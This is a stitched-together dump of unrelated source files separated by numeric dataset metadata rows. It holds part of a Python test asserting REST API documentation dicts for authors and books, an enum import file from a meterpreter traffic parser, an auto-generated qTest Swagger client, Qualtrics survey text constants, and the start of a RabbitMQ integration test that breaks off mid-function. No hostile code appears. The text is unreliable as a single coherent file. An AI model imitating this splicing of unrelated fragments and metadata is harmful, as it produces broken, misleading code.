"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
}
assert put_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"fullName": {"readOnly": True},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
}
}
],
}
assert patch_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"fullName": {"readOnly": True},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
}
}
],
}
assert delete_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [{}],
}
# test collections
collection_meta_doc = MetaDoc(resource_class=AuthorCollectionResource)
get_method_doc = MethodDoc(method="get")
assert get_method_doc.to_dict(meta_doc=collection_meta_doc) == {
"url": "/authors",
"requirements": [],
"queryString": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"jobParams": {
"orderBy": {"type": "string", "list": True},
"maxPageSize": {"type": "integer"},
"offset": {"type": "integer"},
"debug": {"type": "boolean"},
},
"responses": [
{
"fields": {
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
}
}
],
}
# multiple keys
class MultKeyResource(ModelResource):
model_class = MultipleKey
assert MethodDoc._get_input_keys(MultKeyResource) == [
{
"id1": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
}
},
{
"id2": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
}
},
]
# custom response
method_doc = MethodDoc(
"post",
use_default_response=False,
responses=[{"message": "a unique response"}],
)
MetaDoc(
resource_class=MultKeyResource,
methods={method_doc.method: method_doc},
)
assert method_doc.to_dict(meta_doc) == {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [{"message": "a unique response"}],
}
| 38.940205
| 74
| 0.233104
| 2,078
| 49,493
| 5.445621
| 0.072666
| 0.118328
| 0.123188
| 0.134146
| 0.830594
| 0.809297
| 0.788088
| 0.762902
| 0.745758
| 0.738158
| 0
| 0.01741
| 0.657649
| 49,493
| 1,270
| 75
| 38.970866
| 0.650437
| 0.00196
| 0
| 0.713936
| 0
| 0
| 0.16066
| 0
| 0
| 0
| 0
| 0
| 0.017115
| 1
| 0.00163
| false
| 0
| 0.00326
| 0.000815
| 0.031785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
514abcf4fabd1bc6b4fbf2b8bd4063052ba55c22
| 118
|
py
|
Python
|
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | 1
|
2021-12-22T15:14:54.000Z
|
2021-12-22T15:14:54.000Z
|
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | null | null | null |
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | null | null | null |
from .packet_meta_type import PacketMetaType
from .tlv_type import TLVType
from .packet_tlv_type import PacketTLVType
| 29.5
| 44
| 0.872881
| 17
| 118
| 5.764706
| 0.529412
| 0.306122
| 0.265306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 45
| 39.333333
| 0.924528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a9ef7bb7d438786f419ff3aba9fcea91eab0a93
| 12,543
|
py
|
Python
|
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CommonApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def edit_system_field(self, project_id, field_id, body, object_type, **kwargs):
"""
Edit System Field of an Object Type by the field
To edit System Field of an Object Type by the field
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_system_field(project_id, field_id, body, object_type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int field_id: ID of the field. (required)
:param FieldResource body: Given resource to edit a system field. (required)
:param str object_type: The object type. (required)
:return: FieldResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_system_field_with_http_info(project_id, field_id, body, object_type, **kwargs)
else:
(data) = self.edit_system_field_with_http_info(project_id, field_id, body, object_type, **kwargs)
return data
def edit_system_field_with_http_info(self, project_id, field_id, body, object_type, **kwargs):
"""
Edit System Field of an Object Type by the field
To edit System Field of an Object Type by the field
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_system_field_with_http_info(project_id, field_id, body, object_type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param int field_id: ID of the field. (required)
:param FieldResource body: Given resource to edit a system field. (required)
:param str object_type: The object type. (required)
:return: FieldResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'field_id', 'body', 'object_type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_system_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `edit_system_field`")
# verify the required parameter 'field_id' is set
if ('field_id' not in params) or (params['field_id'] is None):
raise ValueError("Missing the required parameter `field_id` when calling `edit_system_field`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `edit_system_field`")
# verify the required parameter 'object_type' is set
if ('object_type' not in params) or (params['object_type'] is None):
raise ValueError("Missing the required parameter `object_type` when calling `edit_system_field`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/settings/{objectType}/system-fields/{fieldId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'field_id' in params:
path_params['fieldId'] = params['field_id']
if 'object_type' in params:
path_params['objectType'] = params['object_type']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FieldResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_custom_field(self, project_id, object_type, body, **kwargs):
"""
field.updateCustomField
Update active or inactive custom fields of an Object Type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_custom_field(project_id, object_type, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str object_type: The object type (required)
:param list[FieldResource] body: Given resource to update custom fields. (required)
:return: list[FieldResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_custom_field_with_http_info(project_id, object_type, body, **kwargs)
else:
(data) = self.update_custom_field_with_http_info(project_id, object_type, body, **kwargs)
return data
def update_custom_field_with_http_info(self, project_id, object_type, body, **kwargs):
"""
field.updateCustomField
Update active or inactive custom fields of an Object Type
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_custom_field_with_http_info(project_id, object_type, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str object_type: The object type (required)
:param list[FieldResource] body: Given resource to update custom fields. (required)
:return: list[FieldResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'object_type', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_custom_field" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_custom_field`")
# verify the required parameter 'object_type' is set
if ('object_type' not in params) or (params['object_type'] is None):
raise ValueError("Missing the required parameter `object_type` when calling `update_custom_field`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_custom_field`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/settings/{objectType}/custom-fields/active'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'object_type' in params:
path_params['objectType'] = params['object_type']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[FieldResource]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.610909
| 129
| 0.586223
| 1,369
| 12,543
| 5.156318
| 0.121256
| 0.056665
| 0.031874
| 0.020399
| 0.913869
| 0.895878
| 0.889786
| 0.871228
| 0.863862
| 0.851962
| 0
| 0.002035
| 0.334131
| 12,543
| 274
| 130
| 45.777372
| 0.843151
| 0.332456
| 0
| 0.679104
| 1
| 0
| 0.210839
| 0.045834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037313
| false
| 0
| 0.052239
| 0
| 0.141791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ab7d2c082c9b1d493376b713180d70763ae1ac4
| 12,598
|
py
|
Python
|
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | 2
|
2021-12-05T08:43:32.000Z
|
2021-12-17T14:08:01.000Z
|
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | null | null | null |
src/utility/qualtrics_constants.py
|
nlpsoc/STEL
|
572ff12efad83ba3e106165218091aef7ccf6ce1
|
[
"MIT"
] | null | null | null |
prolific_msg = "<div>Before you start, please switch off phone/ e-mail/ music so you can focus on this study." \
"</div><br>Thank you!<br><br>Please enter your Prolific ID here:"
consent_msg = "<div>In this study, we do not collect any sensitive data from you. " \
"The only personalized data we save is your prolific id. " \
"We will only make use of the id for communication with you within the prolific platform. " \
"However, your responses (without the prolific id) will be used for research " \
"and can be distributed publicly.<br><br>Do you consent to this?<br></div>"
consent_choices = ['Yes, begin with the study.', 'No, take me back.']
triple_task_description = 'Dear Survey Taker,<br><div><br>' \
'Thank you for taking part in this survey about linguistic style comparisons.<br><br>' \
'<br></div><div><br></div><div>----------------------------------------------------------------------------------------------------<br></div><br>' \
'<div>In this study, you will be expected to complete the following task:' \
'<br><br><strong> Compare the linguistic style of text snippets. </strong><br>' \
'<br>Opposed to content, <strong>style is not about "what" is said but about "how" it is said.</strong><br>' \
'<br>The survey will take place in the form of multiple choice questions of the same setup. ' \
'An example could be:</div><div><br><p><strong> Question</strong>: ' \
'Given the text snippet <br></p><p><br></p><p><strong> ' \
'It reminds me of an old song from the Beatles.</strong> <br></p><p><br></p><p> ' \
'which of the following is more consistent in linguistic style?</p><p>' \
'</p><p><br></p><p><strong> ' \
'Alternative A</strong>: KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol..........<br> <strong> ' \
'Alternative B</strong>: Kevin, I am not exactly an \'American Idol\' viewer.</p><br>' \
'Here, alternative B is more consistent in style as alternative A is noticeably ' \
'more informal (e.g., \'nfnhf\' or \'dunt really\') than the other two text snippets. ' \
'<br></div><div><br>Another example could be:</div><div><br><p><strong> Question</strong>: ' \
'Given the text snippet <br></p><p><br></p><p><strong> ' \
'This stamp became the standard for the remnant of Victoria\'s reign, ' \
'and vast quantities were printed.</strong> <br></p><p><br></p><p> ' \
'which of the following is more consistent in linguistic style?</p><p>' \
'</p><p><br></p><p><strong> ' \
'Alternative A</strong>: Both names became defunct in 2007 when they were merged into The National Museum of Scotland.<br> <strong> ' \
'Alternative B</strong>: Both names stopped being used in 2007 when they became a part of The National Museum of Scotland.</p><br>' \
'Here, alternative A is more consistent in style as alternative B is noticeably less complex ' \
'(e.g., \'stopped being used\' instead of \'became defunct\') than the other two text snippets. ' \
'<br></div><div><br>The examples in the survey might be quite hard. ' \
'In case you can not find a good reasoning for which alternative is more consistent in style, ' \
'<strong>try to compare and find the differences between alternative A and alternative B</strong>. ' \
'</div><div><br>In this survey, you will need different amounts of time to answer the questions. ' \
'On average you should take about 20 seconds per question. ' \
'You will see a total of 16 questions in this survey, which should take you about 6 minutes.<br></div>'
quadruple_task_description = "<div>Dear Survey Taker,</div><div><br>Thank you for taking part in this survey about linguistic style comparisons.<br> </div><div>----------------------------------------------------------------------------------------------------</div><div> </div> In this study, you will be expected to complete the following task:<br><br> <strong>Compare the linguistic style of text snippets.</strong> <br><br>Opposed to content, <strong>style is not about \"what\" is said but about \"how\" it is said</strong>.<br><br>The survey will take place in the form of ranking questions of the same setup. An example could be:<br> <br><br> <strong>Question:</strong> Given the text snippets <br><br> <strong>1. It reminds me of an old song from the Beatles.</strong><br> <strong>2. Reminds me of an old beatles song... cant remember which one tho.</strong><br><br> rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.<br><br> <strong>Alternative A:</strong> KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol..........<br> <strong>Alternative B:</strong> Kevin, I am not exactly an 'American Idol' viewer.<br><br><br>" \
"Here, alternative B is more formal than alternative A (e.g., 'nfnhf' or 'dunt really' in A). " \
"We can also see that text snippet 1 is more formal than text snippet 2 (e.g., snippet 2 contains 'tho' and 'cant'). " \
"As a result, the ordering that is most consistent with the text snippets is alternative B then alternative A. " \
"<br> " \
"<br><br>Another example could be:<br> <br> <strong>Question:</strong> Given the text snippets<br><br> <strong>1. This stamp remained the standard letter stamp for the remainder of Victoria's reign, and vast quantities were printed.</strong><br> <strong>2. This stamp stayed the standard letter stamp for the remainder of Victoria's reign, and a lot of them were printed.</strong><br><br> rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.<br> <br> <strong>Alternative A:</strong> Both names became defunct in 2007 when they were merged into The National Museum of Scotland.<br> <strong>Alternative B:</strong> Both names stopped being used in 2007 when they became a part of The National Museum of Scotland.<br><br> <br>" \
"Here, alternative A is phrased in a more complex style than alternative B (e.g., 'became defunct' instead of 'stopped being used'). " \
"We can also see that text snippet 1 is more complex than 2 (e.g., 'vast quantities' instead of 'a lot of them'). " \
"As a result, the ordering that is most consistent with the text snippets is alternative A then alternative B.<br> <br><br>The examples in the survey might be quite hard. In case you can not find a good reasoning for which ordering is more consistent in style, <strong>try to compare and find the differences between alternative A and alternative B and match them to differences in 1. and 2.</strong><br><br> " \
"In this survey, you will need different amounts of time to answer the questions. " \
"On average you should take about 40 seconds per question. " \
"You will see a total of 16 questions in this survey, which should take you about 11 minutes."
quadruple_id = 'QQ_{}-{}_{}-{}--{}' # 1. anchor1 id, 2. anchor2 id, 3. alternative1 id 4. alternative 2 id, 5. correct alternative
triple_q_format = '<div>Given the text snippet<br /><br /> <strong>{}</strong>' \
'<br /><br />which of the following is more consistent in linguistic style?'
quad_q_format = '<div>Given the text snippets </div><div> </div><div>' \
' ' \
'<strong>1.</strong> <strong>{}</strong> <br></div><div>' \
' ' \
'<strong>2.</strong> <strong>{}</strong><br> </div><div> ' \
'rank the following text snippets to match the given order (1. then 2.) with respect to linguistic style.</div>'
end_comment_msg = 'Thank you for your participation.<br><br>Do you have any comments?'
# triple_end_intro_ex_msg = "<div>Great. Thank you for completing the test round. On to the complex examples.<br>\n<br>\nSmall Note: Every time you submitted an answer, you will receive direct feedback in the form of our 'predicted' correct answer. This is to give you a general idea of your performance. <strong>However, our predicted answers might be wrong. In fact, we expect them to be wrong on several occasions.</strong> Do not take them too seriously.</div>"
triple_intro_ex_1 = {
"anchor": "Here, two points on a sphere are called antipodal if they're in exactly opposite directions from the sphere's center.",
"alternative_0": "In philosophy and logic, the classical liar paradox or liar's paradox or antinomy of the liar is the statement of a liar that he or she is lying: for instance, declaring that 'I am lying'",
"alternative_1": "In philosophy and logic, the classical liar paradox or liar's paradox or antinomy of the liar is the statement of a liar that he or she's lying: for instance, declaring that 'I am lying'",
"anchor_id": "i1_a",
"alternative_0_id": "i1_a0",
"alternative_1_id": "i1_a1",
"correct_msg": "the second option is more consistent in style as she's is a contraction just like they're in the original sentence. Everything else between the alternatives is the same.",
"wrong_msg": "the second option is more consistent in style as she's is a contraction just like they're in the original sentence. Everything else between the alternatives is the same."
}
triple_intro_ex_2 = {
"anchor": "It reminds me of an old song from the Beatles.",
"alternative_0": "KEVIN n nfnhfnigbubjbni.....I dunt really watch American Idol.......... ",
"alternative_1": "Kevin...I'm not exactly an 'American Idol' viewer.",
"anchor_id": "i2_a",
"alternative_0_id": "i2_a0",
"alternative_1_id": "i2_a1",
"correct_msg": "the second option is more consistent in style as the first option is noticeably more informal than the original sentence. Here you can see that the reasoning already becomes less 'concrete'.",
"wrong_msg": "the second option is more consistent in style as the first option is noticeably more informal than the original sentence. Here you can see that the reasoning already becomes less 'concrete'."
}
triple_intro_exs = [triple_intro_ex_1, triple_intro_ex_2]
EMBED_SCREENED_OUT = "Screened Out"
QID_PROLIFIC_PID = 'Q-welcome_prolific-id'
RESPONSE_TYPE_COL = "Q_Response_Type"
VALID_RESPONSE = "Valid"
| 134.021277
| 1,617
| 0.630418
| 1,846
| 12,598
| 4.265439
| 0.172264
| 0.2032
| 0.262129
| 0.300737
| 0.714757
| 0.699771
| 0.674879
| 0.665735
| 0.645669
| 0.629286
| 0
| 0.007844
| 0.220829
| 12,598
| 94
| 1,618
| 134.021277
| 0.794315
| 0.044134
| 0
| 0.091954
| 0
| 0.218391
| 0.812791
| 0.202824
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.022989
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ad767d4fd762cffda9806b872cda44e89c20dd6
| 127
|
py
|
Python
|
straintables/__init__.py
|
Gab0/linkageMapper
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | null | null | null |
straintables/__init__.py
|
Gab0/linkageMapper
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | 1
|
2020-05-03T15:13:07.000Z
|
2020-05-04T03:01:59.000Z
|
straintables/__init__.py
|
Gab0/straintables
|
549b292e5b6ab22e03373483cd27236aa2f635eb
|
[
"MIT"
] | null | null | null |
from straintables import logo, Definitions
from straintables import skdistance
from straintables import InputFile, OutputFile
| 25.4
| 46
| 0.866142
| 14
| 127
| 7.857143
| 0.571429
| 0.436364
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11811
| 127
| 4
| 47
| 31.75
| 0.982143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
517ed81a979e26761466936b0de68adcae89b770
| 55,087
|
py
|
Python
|
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_storage_rabbitmq/test.py
|
em0t/ClickHouse
|
ff2d9aec1a141679c8b3ea231ab59962d740c8b4
|
[
"Apache-2.0"
] | null | null | null |
import os.path as p
import random
import threading
import time
import pytest
from random import randrange
import pika
from sys import getdefaultencoding
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
from google.protobuf.internal.encoder import _VarintBytes
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/rabbitmq.xml','configs/log_conf.xml'],
with_rabbitmq=True)
rabbitmq_id = ''
# Helpers
def check_rabbitmq_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
rabbitmq_id,
'rabbitmqctl',
'await_startup'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def enable_consistent_hash_plugin():
p = subprocess.Popen(('docker',
'exec',
'-i',
rabbitmq_id,
"rabbitmq-plugins", "enable", "rabbitmq_consistent_hash_exchange"),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_rabbitmq_is_available(max_retries=50):
retries = 0
while True:
if check_rabbitmq_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "RabbitMQ is not available"
print("Waiting for RabbitMQ to start up")
time.sleep(1)
def wait_rabbitmq_plugin_enabled(max_retries=50):
retries = 0
while True:
if enable_consistent_hash_plugin():
break
else:
retries += 1
if retries > max_retries:
raise "RabbitMQ plugin is not available"
print("Waiting for plugin")
time.sleep(1)
def rabbitmq_check_result(result, check=False, ref_file='test_rabbitmq_json.reference'):
